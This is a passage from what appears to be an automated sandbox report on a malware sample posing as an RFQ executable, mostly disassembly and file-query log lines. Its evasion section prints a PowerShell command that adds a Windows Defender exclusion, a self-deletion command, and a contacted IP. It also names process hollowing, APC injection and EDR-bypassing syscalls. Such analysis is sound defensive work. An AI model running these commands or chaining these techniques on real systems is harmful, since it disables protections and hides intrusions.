          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0176096E mov eax, dword ptr fs:[00000030h]5_2_0176096E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0176096E mov edx, dword ptr fs:[00000030h]5_2_0176096E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0176096E mov eax, dword ptr fs:[00000030h]5_2_0176096E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A0946 mov eax, dword ptr fs:[00000030h]5_2_017A0946
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4940 mov eax, dword ptr fs:[00000030h]5_2_017F4940
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A892A mov eax, dword ptr fs:[00000030h]5_2_017A892A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B892B mov eax, dword ptr fs:[00000030h]5_2_017B892B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC912 mov eax, dword ptr fs:[00000030h]5_2_017AC912
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718918 mov eax, dword ptr fs:[00000030h]5_2_01718918
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718918 mov eax, dword ptr fs:[00000030h]5_2_01718918
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h]5_2_0179E908
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179E908 mov eax, dword ptr fs:[00000030h]5_2_0179E908
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h]5_2_017529F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017529F9 mov eax, dword ptr fs:[00000030h]5_2_017529F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE9E0 mov eax, dword ptr fs:[00000030h]5_2_017AE9E0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172A9D0 mov eax, dword ptr fs:[00000030h]5_2_0172A9D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017549D0 mov eax, dword ptr fs:[00000030h]5_2_017549D0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EA9D3 mov eax, dword ptr fs:[00000030h]5_2_017EA9D3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B69C0 mov eax, dword ptr fs:[00000030h]5_2_017B69C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A89B3 mov esi, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017A89B3 mov eax, dword ptr fs:[00000030h]5_2_017A89B3
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017329A0 mov eax, dword ptr fs:[00000030h]5_2_017329A0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017209AD mov eax, dword ptr fs:[00000030h]5_2_017209AD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017209AD mov eax, dword ptr fs:[00000030h]5_2_017209AD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h]5_2_017AE872
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AE872 mov eax, dword ptr fs:[00000030h]5_2_017AE872
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h]5_2_017B6870
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6870 mov eax, dword ptr fs:[00000030h]5_2_017B6870
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01750854 mov eax, dword ptr fs:[00000030h]5_2_01750854
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724859 mov eax, dword ptr fs:[00000030h]5_2_01724859
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01724859 mov eax, dword ptr fs:[00000030h]5_2_01724859
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01732840 mov ecx, dword ptr fs:[00000030h]5_2_01732840
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov ecx, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01742835 mov eax, dword ptr fs:[00000030h]5_2_01742835
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175A830 mov eax, dword ptr fs:[00000030h]5_2_0175A830
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]5_2_017C483A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C483A mov eax, dword ptr fs:[00000030h]5_2_017C483A
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC810 mov eax, dword ptr fs:[00000030h]5_2_017AC810
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]5_2_0175C8F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175C8F9 mov eax, dword ptr fs:[00000030h]5_2_0175C8F9
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EA8E4 mov eax, dword ptr fs:[00000030h]5_2_017EA8E4
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174E8C0 mov eax, dword ptr fs:[00000030h]5_2_0174E8C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F08C0 mov eax, dword ptr fs:[00000030h]5_2_017F08C0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017AC89D mov eax, dword ptr fs:[00000030h]5_2_017AC89D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720887 mov eax, dword ptr fs:[00000030h]5_2_01720887
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0171CB7E mov eax, dword ptr fs:[00000030h]5_2_0171CB7E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01718B50 mov eax, dword ptr fs:[00000030h]5_2_01718B50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F2B57 mov eax, dword ptr fs:[00000030h]5_2_017F2B57
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CEB50 mov eax, dword ptr fs:[00000030h]5_2_017CEB50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]5_2_017D4B4B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4B4B mov eax, dword ptr fs:[00000030h]5_2_017D4B4B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]5_2_017B6B40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017B6B40 mov eax, dword ptr fs:[00000030h]5_2_017B6B40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017EAB40 mov eax, dword ptr fs:[00000030h]5_2_017EAB40
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017C8B42 mov eax, dword ptr fs:[00000030h]5_2_017C8B42
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]5_2_0174EB20
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EB20 mov eax, dword ptr fs:[00000030h]5_2_0174EB20
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]5_2_017E8B28
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017E8B28 mov eax, dword ptr fs:[00000030h]5_2_017E8B28
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179EB1D mov eax, dword ptr fs:[00000030h]5_2_0179EB1D
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017F4B00 mov eax, dword ptr fs:[00000030h]5_2_017F4B00
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728BF0 mov eax, dword ptr fs:[00000030h]5_2_01728BF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EBFC mov eax, dword ptr fs:[00000030h]5_2_0174EBFC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017ACBF0 mov eax, dword ptr fs:[00000030h]5_2_017ACBF0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CEBD0 mov eax, dword ptr fs:[00000030h]5_2_017CEBD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01740BCB mov eax, dword ptr fs:[00000030h]5_2_01740BCB
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720BCD mov eax, dword ptr fs:[00000030h]5_2_01720BCD
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]5_2_01730BBE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730BBE mov eax, dword ptr fs:[00000030h]5_2_01730BBE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]5_2_017D4BB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017D4BB0 mov eax, dword ptr fs:[00000030h]5_2_017D4BB0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]5_2_0179CA72
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0179CA72 mov eax, dword ptr fs:[00000030h]5_2_0179CA72
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA6F mov eax, dword ptr fs:[00000030h]5_2_0175CA6F
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017CEA60 mov eax, dword ptr fs:[00000030h]5_2_017CEA60
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01726A50 mov eax, dword ptr fs:[00000030h]5_2_01726A50
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]5_2_01730A5B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01730A5B mov eax, dword ptr fs:[00000030h]5_2_01730A5B
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]5_2_01744A35
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01744A35 mov eax, dword ptr fs:[00000030h]5_2_01744A35
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175CA24 mov eax, dword ptr fs:[00000030h]5_2_0175CA24
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0174EA2E mov eax, dword ptr fs:[00000030h]5_2_0174EA2E
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_017ACA11 mov eax, dword ptr fs:[00000030h]5_2_017ACA11
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]5_2_0175AAEE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0175AAEE mov eax, dword ptr fs:[00000030h]5_2_0175AAEE
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01720AD0 mov eax, dword ptr fs:[00000030h]5_2_01720AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]5_2_01754AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01754AD0 mov eax, dword ptr fs:[00000030h]5_2_01754AD0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776ACC mov eax, dword ptr fs:[00000030h]5_2_01776ACC
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]5_2_01728AA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01728AA0 mov eax, dword ptr fs:[00000030h]5_2_01728AA0
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01776AA4 mov eax, dword ptr fs:[00000030h]5_2_01776AA4
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_01758A90 mov edx, dword ptr fs:[00000030h]5_2_01758A90
          Source: C:\Users\user\Desktop\RFQ 245801.exeCode function: 5_2_0172EA80 mov eax, dword ptr fs:[00000030h]5_2_0172EA80
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00642167 GetProcessHeap,htons,htons,InternalGetTcpTableWithOwnerModule,htons,htons,InternalGetTcpTable2,htons,htons,HeapFree,InternalGetBoundTcpEndpointTable,htons,htons,HeapFree,htons,htons,InternalGetTcp6TableWithOwnerModule,htons,htons,InternalGetTcp6Table2,htons,htons,HeapFree,InternalGetBoundTcp6EndpointTable,htons,htons,HeapFree,InternalGetUdpTableWithOwnerModule,htons,HeapFree,InternalGetUdp6TableWithOwnerModule,htons,HeapFree,7_2_00642167
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00645DC0 SetUnhandledExceptionFilter,7_2_00645DC0
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_00645C30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,7_2_00645C30
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 188.114.96.3 80Jump to behavior
          Adds a directory exclusion to Windows Defender
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Found direct / indirect Syscall (likely to bypass EDR)
          Source: C:\Users\user\Desktop\RFQ 245801.exeNtQueueApcThread: Indirect: 0x1B9A4F2Jump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeNtClose: Indirect: 0x1B9A56C
          Injects a PE file into a foreign processes
          Source: C:\Users\user\Desktop\RFQ 245801.exeMemory written: C:\Users\user\Desktop\RFQ 245801.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another process
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXESection loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ 245801.exeThread register set: target process: 2580Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEThread register set: target process: 2580Jump to behavior
          Queues an APC in another process (thread injection)
          Source: C:\Users\user\Desktop\RFQ 245801.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing technique
          Source: C:\Users\user\Desktop\RFQ 245801.exeSection unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: 640000Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: memset,OpenProcess,K32GetModuleBaseNameW,CompareStringW,CompareStringW,GetSystemDirectoryW,LoadLibraryExW,GetProcAddress,K32GetModuleBaseNameW,CloseHandle,LocalFree,FreeLibrary, svchost.exe7_2_006438D2
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeProcess created: C:\Users\user\Desktop\RFQ 245801.exe "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\RFQ 245801.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 7_2_006458B6 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,7_2_006458B6
          Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1743773191.0000000009815000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4150770824.0000000004CE0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000002.4142888075.0000000001240000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.1729409948.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman$
          Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000006.00000002.4143911941.00000000018A1000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.1730926312.00000000018A0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Users\user\Desktop\RFQ 245801.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\RFQ 245801.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
